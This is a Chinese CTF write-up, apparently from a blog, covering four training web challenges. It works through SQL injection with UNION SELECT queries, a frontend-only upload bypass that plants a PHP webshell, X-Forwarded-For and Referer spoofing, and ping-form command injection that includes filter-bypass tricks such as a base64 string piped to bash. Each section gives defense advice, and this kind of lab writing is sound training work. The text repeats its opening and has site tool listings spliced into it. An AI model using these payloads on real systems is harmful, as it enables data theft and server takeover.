
一:Newscenter
打开为如下所示。

经过尝试,得知在输入框中输入数字可得到不同内容。

输入 23 就没有新闻。

所以我们得知这个输入框和数据库有交互,那这题考察的可能就是 SQL 注入。
发现将数据库中所有的内容都查询了出来,那这个题考察的就是 SQL 注入。

字段长度为 3。
23' order by 3 #

回显字段有 2,3。
23' union select 1,2,3 #

数据库名为 news。
23
通过四个攻防世界 Web 安全题目演示常见漏洞利用方法。包括 Newscenter 的 SQL 注入(联合查询获取数据库信息)、upload1 的文件上传绕过(前端验证失效)、Xff_referer 的 HTTP 头伪造(IP 与来源验证绕过)以及 Command_execution 的命令注入(执行系统命令)。最后总结了各漏洞的考察点、解题思路及防御建议,强调使用预编译语句、白名单机制及安全 API 的重要性。


打开为如下所示。

经过尝试,得知在输入框中输入数字可得到不同内容。

输入 23 就没有新闻。

所以我们得知这个输入框和数据库有交互,那这题考察的可能就是 SQL 注入。
发现将数据库中所有的内容都查询了出来,那这个题考察的就是 SQL 注入。

字段长度为 3。
23' order by 3 #

回显字段有 2,3。
23' union select 1,2,3 #

数据库名为 news。
23

微信公众号「极客日志」,在微信中扫描左侧二维码关注。展示文案:极客日志 zeeklog
解析常见 curl 参数并生成 fetch、axios、PHP curl 或 Python requests 示例代码。 在线工具,curl 转代码在线工具,online
将字符串编码和解码为其 Base64 格式表示形式即可。 在线工具,Base64 字符串编码/解码在线工具,online
将字符串、文件或图像转换为其 Base64 表示形式。 在线工具,Base64 文件转换器在线工具,online
将 Markdown(GFM)转为 HTML 片段,浏览器内 marked 解析;与 HTML 转 Markdown 互为补充。 在线工具,Markdown 转 HTML在线工具,online
将 HTML 片段转为 GitHub Flavored Markdown,支持标题、列表、链接、代码块与表格等;浏览器内处理,可链接预填。 在线工具,HTML 转 Markdown在线工具,online
通过删除不必要的空白来缩小和压缩JSON。 在线工具,JSON 压缩在线工具,online

表名为如下。
23' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="news" #

根据表名查到列名。
23' union select 1,group_concat(column_name),3 from information_schema.columns where table_name="secret_table" #

成功拿到 flag。
23' union select 1,fl4g,3 from secret_table #

发现有提示框提示需要上传图片,既然是提示框那就说明是前端验证。

关闭如下所示。

然后我们上传一张 php 即可。

用蚁剑连接即可,成功拿到 flag。

打开提示我们 ip 必须为 123.123.123.123,那我们得知既然要 ip 来自于 123,那就需要进行伪造 ip 头也就是 X-Forwarded-For 字段。

打开 bp 进行抓包。
输入 X-Forwarded-For:123.123.123.123 进行伪造
发送后又提示我们来源为 google,来源字段是 referer。

伪造 referer 字段。

打开发现为 ping 功能,我们先随便 ping 一下然后再看看能否查看其他数据。

Ping 127.0.0.1 发现可以,那我们填写这样的 payload:127.0.0.1 | ls。

成功执行 ls,说明没有任何过滤。那接下来就可以查找 flag 了。

执行 127.0.0.1 |find / -name "fl*"。
发现可以文件如下。

成功拿到 flag。

考察点
解题思路
',观察是否存在报错。ORDER BY 确定查询字段数(如 ' ORDER BY 3--)。' UNION SELECT 1,2,database()-- 获取数据库名。information_schema.tables)、列名,最终读取 flag 字段。关键技术
information_schema 数据库获取元数据。防御建议
考察点
解题思路
.php,并抓包修改 Content-Type 为 image/jpeg。.htaccess 文件设置解析规则(如 AddType application/x-httpd-php .jpg)。关键技术
up.php.phtml)。test.php.xxx)。防御建议
考察点
X-Forwarded-For(XFF)和 Referer 头绕过访问控制。解题思路
X-Forwarded-For: 127.0.0.1 伪装本地 IP。Referer 为题目指定域名(如 http://www.google.com)通过验证。关键技术
防御建议
考察点
解题思路
127.0.0.1; ls 尝试执行命令。${IFS} 或 %09(Tab 的 URL 编码)。ca\t 或 base64 编码命令(如 echo "Y2F0IGZsYWc=" | base64 -d | bash)。cat 或 tac 命令读取 flag 文件。关键技术
;、&、|、||。cat fla*。防御建议
subprocess 模块)替代直接执行命令。